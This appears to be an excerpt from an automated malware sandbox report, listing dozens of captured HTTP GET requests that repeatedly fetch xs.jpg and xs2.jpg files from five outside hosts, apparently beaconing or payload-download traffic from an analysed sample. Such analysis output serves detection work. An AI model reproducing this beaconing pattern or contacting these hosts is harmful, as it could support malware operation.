        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2373b5c6=-1915824360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?24e8c9b5=619235765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?253cedcf=1874250093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?26879fc4=1522834916 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?27f237dd=396330763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?29ccf744=-1489773296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2bcaf743=1582807576 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2ca70649=-1098498342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2cfced02=1509546500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?2e7d9d4b=1944906328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3c09d975=2014556906 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3d14cd8b=633027043 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3e44093b=-116382484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159330|1720159260|3|19|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3f86f717=1002352591 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?41d7fe37=-1961888438 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?445d8e02=-561061362 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159333|1720159259|3|20|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?45cf8c26=389951640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159334|1720159259|3|20|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4666d3a0=-1073462208 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159334|1720159260|3|20|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?47518eef=-1901912610 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?494885e8=-1819495128 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4e1a4979=218554042 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159337|1720159259|3|21|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?4fe5ce70=1066875328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159338|1720159259|3|21|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?50eb79ae=-222139126 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159338|1720159260|3|21|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?54bd4f7c=-29888908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5bf62f02=667228684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5fcee9d4=-1633131316 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159342|1720159259|4|22|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?66b9efaa=-1696088408 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159342|1720159259|3|22|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?6c8a2c8f=-1305955780 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159343|1720159260|4|22|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6e4b76cf=-594088546 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?72a457e7=1026930563 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7a6a3bf3=-187402266 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159345|1720159259|3|23|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7f8f3cd8=-14779984 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159346|1720159259|3|23|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8644bbad=-1200973547 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159346|1720159260|3|23|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?8cd08851=-1502504717 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?908734c0=-1522004096 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9a275efc=46455532 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159349|1720159259|3|24|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9ffb83c1=-1075505530 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159350|1720159259|3|24|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?a5ab2386=-2018641750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159351|1720159260|4|24|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a9db6871=-1485987388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?adce999d=316119470 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bbd2b314=-1424130204 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159354|1720159259|4|25|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c1df27dd=251215592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159354|1720159259|3|25|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c3baede6=500657968 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159355|1720159260|4|25|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c750acd5=-1902028374 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?cbebb896=1673734594 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d597c30b=-2134423263 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159357|1720159259|3|26|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?defe4bdb=972408610 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159358|1720159259|3|26|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e806d3ea=675115834 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159359|1720159260|4|26|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ed0b353e=-954097734 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f50273b1=-1659498183 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4745dc7=523145329 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159361|1720159259|3|27|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c7a449b=1256037282 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159362|1720159259|3|27|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?10878fe9=831958971 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159363|1720159260|4|27|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?17066025=-432029326 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1ebf202e=-684072638 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2e78457f=1559268094 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159366|1720159259|4|28|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?356cb59d=1979250507 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159366|1720159259|3|28|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3b3f41b1=-1631925289 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159367|1720159260|4|28|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3fc1b58c=-1102317868 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a0c60b5a=1203532164 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?993d7f2c=-30180388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159370|1720159259|4|29|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d9ba63d9=-642096167 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159371|1720159259|4|29|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8f00ee41=-1777774966 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159372|1720159260|4|29|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?696b574e=1010959850 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?cd510956=43331246 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?91f5dba5=-1243507985 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159375|1720159259|4|30|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?96090d15=739383850 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159375|1720159259|4|30|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?15c817e8=365434856 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159376|1720159260|4|30|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?334f6b3c=870089576 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1da045db=-1809752761 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?41ed49d4=-976757380 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159380|1720159259|4|31|0
